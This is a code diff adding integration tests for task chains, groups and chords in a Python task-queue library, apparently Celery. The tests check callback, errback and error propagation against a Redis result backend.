+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_with_errback_child_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ chain_sig = chain(add_replaced.si(42, 1337), fail.s())
+ chain_sig.link_error(errback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after chain finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_child_with_callback_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ child_sig = add_replaced.si(42, 1337)
+ child_sig.link(callback)
+ chain_sig = chain(child_sig, identity.s())
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ assert res_obj.get(timeout=TIMEOUT) == 42 + 1337
+ with subtests.test(msg="Callback is called after chain finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_child_with_errback_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ child_sig = fail_replaced.si()
+ child_sig.link_error(errback)
+ chain_sig = chain(child_sig, identity.si(42))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after chain finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_task_replaced_with_chain(self):
+ orig_sig = replace_with_chain.si(42)
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == 42
+
+ def test_chain_child_replaced_with_chain_first(self):
+ orig_sig = chain(replace_with_chain.si(42), identity.s())
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == 42
+
+ def test_chain_child_replaced_with_chain_middle(self):
+ orig_sig = chain(
+ identity.s(42), replace_with_chain.s(), identity.s()
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == 42
+
+ def test_chain_child_replaced_with_chain_last(self):
+ orig_sig = chain(identity.s(42), replace_with_chain.s())
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == 42
+
class test_result_set:
@@ -504,6 +844,354 @@ def test_large_group(self, manager):
assert res.get(timeout=TIMEOUT) == list(range(1000))
+ def test_group_lone(self, manager):
+ """
+ Test that a simple group completes.
+ """
+ sig = group(identity.s(42), identity.s(42)) # [42, 42]
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_group_group(self, manager):
+ """
+ Confirm that groups nested inside groups get unrolled.
+ """
+ sig = group(
+ group(identity.s(42), identity.s(42)), # [42, 42]
+ ) # [42, 42] due to unrolling
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_group_chord_counting_simple(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_sig = identity.si(42)
+ child_chord = chord((gchild_sig, ), identity.s())
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected
+ assert res.get(timeout=TIMEOUT) == [[42]]
+
+ def test_nested_group_chord_counting_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_count = 42
+ gchild_sig = chain((identity.si(1337), ) * gchild_count)
+ child_chord = chord((gchild_sig, ), identity.s())
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected
+ assert res.get(timeout=TIMEOUT) == [[1337]]
+
+ def test_nested_group_chord_counting_group(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_count = 42
+ gchild_sig = group((identity.si(1337), ) * gchild_count)
+ child_chord = chord((gchild_sig, ), identity.s())
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected
+ assert res.get(timeout=TIMEOUT) == [[1337] * gchild_count]
+
+ def test_nested_group_chord_counting_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_count = 42
+ gchild_sig = chord(
+ (identity.si(1337), ) * gchild_count, identity.si(31337),
+ )
+ child_chord = chord((gchild_sig, ), identity.s())
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected
+ assert res.get(timeout=TIMEOUT) == [[31337]]
+
+ def test_nested_group_chord_counting_mixed(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_count = 42
+ child_chord = chord(
+ (
+ identity.si(42),
+ chain((identity.si(42), ) * gchild_count),
+ group((identity.si(42), ) * gchild_count),
+ chord((identity.si(42), ) * gchild_count, identity.si(1337)),
+ ),
+ identity.s(),
+ )
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected. The
+ # group result gets unrolled into the encapsulating chord, hence the
+ # weird unpacking below
+ assert res.get(timeout=TIMEOUT) == [
+ [42, 42, *((42, ) * gchild_count), 1337]
+ ]
+
+ @pytest.mark.xfail(raises=TimeoutError, reason="#6734")
+ def test_nested_group_chord_body_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_chord = chord(identity.si(42), chain((identity.s(), )))
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # The result can be expected to timeout since it seems like its
+ # underlying promise might not be getting fulfilled (ref #6734). Pick a
+ # short timeout since we don't want to block for ages and this is a
+ # fairly simple signature which should run pretty quickly.
+ expected_result = [[42]]
+ with pytest.raises(TimeoutError) as expected_excinfo:
+ res.get(timeout=TIMEOUT / 10)
+ # Get the child `AsyncResult` manually so that we don't have to wait
+ # again for the `GroupResult`
+ assert res.children[0].get(timeout=TIMEOUT) == expected_result[0]
+ assert res.get(timeout=TIMEOUT) == expected_result
+ # Re-raise the expected exception so this test will XFAIL
+ raise expected_excinfo.value
+
+ def test_callback_called_by_group(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ callback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ callback = redis_echo.si(callback_msg, redis_key=redis_key)
+
+ group_sig = group(identity.si(42), identity.si(1337))
+ group_sig.link(callback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Group result is returned"):
+ res = group_sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 1337]
+ with subtests.test(msg="Callback is called after group is completed"):
+ await_redis_echo({callback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_errback_called_by_group_fail_first(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+
+ group_sig = group(fail.s(), identity.si(42))
+ group_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from group"):
+ res = group_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group task fails"):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_errback_called_by_group_fail_last(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+
+ group_sig = group(identity.si(42), fail.s())
+ group_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from group"):
+ res = group_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group task fails"):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_errback_called_by_group_fail_multiple(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ expected_errback_count = 42
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ # Include a mix of passing and failing tasks
+ group_sig = group(
+ *(identity.si(42) for _ in range(24)), # arbitrary task count
+ *(fail.s() for _ in range(expected_errback_count)),
+ )
+ group_sig.link_error(errback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from group"):
+ res = group_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group task fails"):
+ await_redis_count(expected_errback_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_children_with_callbacks(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ child_task_count = 42
+ child_sig = identity.si(1337)
+ child_sig.link(callback)
+ group_sig = group(child_sig for _ in range(child_task_count))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ assert res_obj.get(timeout=TIMEOUT) == [1337] * child_task_count
+ with subtests.test(msg="Chain child task callbacks are called"):
+ await_redis_count(child_task_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_children_with_errbacks(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ child_task_count = 42
+ child_sig = fail.si()
+ child_sig.link_error(errback)
+ group_sig = group(child_sig for _ in range(child_task_count))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain fails due to a child task dying"):
+ res_obj = group_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Chain child task errbacks are called"):
+ await_redis_count(child_task_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_with_callback_child_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ group_sig = group(add_replaced.si(42, 1337), identity.si(31337))
+ group_sig.link(callback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ assert res_obj.get(timeout=TIMEOUT) == [42 + 1337, 31337]
+ with subtests.test(msg="Callback is called after group finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_with_errback_child_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ group_sig = group(add_replaced.si(42, 1337), fail.s())
+ group_sig.link_error(errback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_child_with_callback_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ child_sig = add_replaced.si(42, 1337)
+ child_sig.link(callback)
+ group_sig = group(child_sig, identity.si(31337))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ assert res_obj.get(timeout=TIMEOUT) == [42 + 1337, 31337]
+ with subtests.test(msg="Callback is called after group finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_child_with_errback_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ child_sig = fail_replaced.si()
+ child_sig.link_error(errback)
+ group_sig = group(child_sig, identity.si(42))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_child_replaced_with_chain_first(self):
+ orig_sig = group(replace_with_chain.si(42), identity.s(1337))
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337]
+
+ def test_group_child_replaced_with_chain_middle(self):
+ orig_sig = group(
+ identity.s(42), replace_with_chain.s(1337), identity.s(31337)
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337, 31337]
+
+ def test_group_child_replaced_with_chain_last(self):
+ orig_sig = group(identity.s(42), replace_with_chain.s(1337))
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337]
+
def assert_ids(r, expected_value, expected_root_id, expected_parent_id):
root_id, parent_id, value = r.get(timeout=TIMEOUT)
@@ -635,10 +1323,12 @@ def test_eager_chord_inside_task(self, manager):
chord_add.app.conf.task_always_eager = prev
- @flaky
def test_group_chain(self, manager):
- if not manager.app.conf.result_backend.startswith('redis'):
- raise pytest.skip('Requires redis result backend.')
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
c = (
add.s(2, 2) |
group(add.s(i) for i in range(4)) |
@@ -647,11 +1337,6 @@ def test_group_chain(self, manager):
res = c()
assert res.get(timeout=TIMEOUT) == [12, 13, 14, 15]
- @flaky
- @pytest.mark.xfail(os.environ['TEST_BACKEND'] == 'cache+pylibmc://',
- reason="Not supported yet by the cache backend.",
- strict=True,
- raises=ChordError)
def test_nested_group_chain(self, manager):
try:
manager.app.backend.ensure_chords_allowed()
@@ -812,11 +1497,14 @@ def test_chord_on_error(self, manager):
if not manager.app.conf.result_backend.startswith('redis'):
raise pytest.skip('Requires redis result backend.')
- # Run the chord and wait for the error callback to finish.
+ # Run the chord and wait for the error callback to finish. Note that
+ # this only works for old style callbacks since they get dispatched to
+ # run async while new style errbacks are called synchronously so that
+ # they can be passed the request object for the failing task.
c1 = chord(
header=[add.s(1, 2), add.s(3, 4), fail.s()],
body=print_unicode.s('This should not be called').on_error(
- chord_error.s()),
+ errback_old_style.s()),
)
res = c1()
with pytest.raises(ExpectedException):
@@ -828,8 +1516,11 @@ def test_chord_on_error(self, manager):
lambda: res.children[0].children,
lambda: res.children[0].children[0].result,
)
+ start = monotonic()
while not all(f() for f in check):
- pass
+ if monotonic() > start + TIMEOUT:
+ raise TimeoutError("Timed out waiting for children")
+ sleep(0.1)
# Extract the results of the successful tasks from the chord.
#
@@ -840,9 +1531,15 @@ def test_chord_on_error(self, manager):
# So for clarity of our test, we instead do it here.
# Use the error callback's result to find the failed task.
- error_callback_result = AsyncResult(
- res.children[0].children[0].result[0])
- failed_task_id = error_callback_result.result.args[0].split()[3]
+ uuid_patt = re.compile(
+ r"[0-9A-Fa-f]{8}-([0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}"
+ )
+ callback_chord_exc = AsyncResult(
+ res.children[0].children[0].result
+ ).result
+ failed_task_id = uuid_patt.search(str(callback_chord_exc))
+ assert (failed_task_id is not None), "No task ID in %r" % callback_chord_exc
+ failed_task_id = failed_task_id.group()
# Use new group_id result metadata to get group ID.
failed_task_result = AsyncResult(failed_task_id)
@@ -868,6 +1565,22 @@ def test_chord_on_error(self, manager):
assert len([cr for cr in chord_results if cr[2] != states.SUCCESS]
) == 1
+ @flaky
+ def test_generator(self, manager):
+ def assert_generator(file_name):
+ for i in range(3):
+ sleep(1)
+ if i == 2:
+ with open(file_name) as file_handle:
+ # ensures chord header generators tasks are processed incrementally #3021
+ assert file_handle.readline() == '0\n', "Chord header was unrolled too early"
+ yield write_to_file_and_return_int.s(file_name, i)
+
+ with tempfile.NamedTemporaryFile(mode='w', delete=False) as tmp_file:
+ file_name = tmp_file.name
+ c = chord(assert_generator(file_name), tsum.s())
+ assert c().get(timeout=TIMEOUT) == 3
+
@flaky
def test_parallel_chords(self, manager):
try:
@@ -958,6 +1671,25 @@ def test_chord_in_chain_with_args(self, manager):
res1 = c1.apply(args=(1,))
assert res1.get(timeout=TIMEOUT) == [1, 1]
+ @pytest.mark.xfail(reason="Issue #6200")
+ def test_chain_in_chain_with_args(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ c1 = chain( # NOTE: This chain should have only 1 chain inside it
+ chain(
+ identity.s(),
+ identity.s(),
+ ),
+ )
+
+ res1 = c1.apply_async(args=(1,))
+ assert res1.get(timeout=TIMEOUT) == 1
+ res1 = c1.apply(args=(1,))
+ assert res1.get(timeout=TIMEOUT) == 1
+
@flaky
def test_large_header(self, manager):
try:
@@ -991,3 +1723,788 @@ def test_priority_chain(self, manager):
c = return_priority.signature(priority=3) | return_priority.signature(
priority=5)
assert c().get(timeout=TIMEOUT) == "Priority: 5"
+
+ def test_nested_chord_group(self, manager):
+ """
+ Confirm that groups nested inside chords get unrolled.
+ """
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chord(
+ (
+ group(identity.s(42), identity.s(42)), # [42, 42]
+ ),
+ identity.s() # [42, 42]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_chord_group_chain_group_tail(self, manager):
+ """
+ Sanity check that a deeply nested group is completed as expected.
+
+ Groups at the end of chains nested in chords have had issues and this
+ simple test sanity check that such a task structure can be completed.
+ """
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chord(
+ group(
+ chain(
+ identity.s(42), # 42
+ group(
+ identity.s(), # 42
+ identity.s(), # 42
+ ), # [42, 42]
+ ), # [42, 42]
+ ), # [[42, 42]] since the chain prevents unrolling
+ identity.s(), # [[42, 42]]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [[42, 42]]
+
+ @pytest.mark.xfail(TEST_BACKEND.startswith('redis://'), reason="Issue #6437")
+ def test_error_propagates_from_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = add.s(1, 1) | fail.s() | group(add.s(1), add.s(1))
+ res = sig.delay()
+
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_error_propagates_from_chord2(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = add.s(1, 1) | add.s(1) | group(add.s(1), fail.s())
+ res = sig.delay()
+
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_error_propagates_to_chord_from_simple(self, manager, subtests):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_sig = fail.s()
+
+ chord_sig = chord((child_sig, ), identity.s())
+ with subtests.test(msg="Error propagates from simple header task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ with subtests.test(msg="Error propagates from simple body task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_immutable_errback_called_by_chord_from_simple(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+ child_sig = fail.s()
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from simple header task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after simple header task fails"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from simple body task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after simple body task fails"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_simple(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback = errback_task.s()
+ child_sig = fail.s()
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from simple header task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after simple header task fails"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from simple body task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after simple body task fails"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+ redis_connection.delete(expected_redis_key)
+
+ def test_error_propagates_to_chord_from_chain(self, manager, subtests):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_sig = chain(identity.si(42), fail.s(), identity.si(42))
+
+ chord_sig = chord((child_sig, ), identity.s())
+ with subtests.test(
+ msg="Error propagates from header chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ with subtests.test(
+ msg="Error propagates from body chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_immutable_errback_called_by_chord_from_chain(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+ child_sig = chain(identity.si(42), fail.s(), identity.si(42))
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails before the end"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(
+ msg="Error propagates from body chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after body chain which fails before the end"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_chain(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback = errback_task.s()
+ fail_sig = fail.s()
+ fail_sig_id = fail_sig.freeze().id
+ child_sig = chain(identity.si(42), fail_sig, identity.si(42))
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails before the end"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ expected_redis_key = fail_sig_id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(
+ msg="Error propagates from body chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after body chain which fails before the end"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+ redis_connection.delete(expected_redis_key)
+
+ def test_error_propagates_to_chord_from_chain_tail(self, manager, subtests):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_sig = chain(identity.si(42), fail.s())
+
+ chord_sig = chord((child_sig, ), identity.s())
+ with subtests.test(
+ msg="Error propagates from header chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ with subtests.test(
+ msg="Error propagates from body chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_immutable_errback_called_by_chord_from_chain_tail(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+ child_sig = chain(identity.si(42), fail.s())
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails at the end"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(
+ msg="Error propagates from body chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after body chain which fails at the end"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_chain_tail(
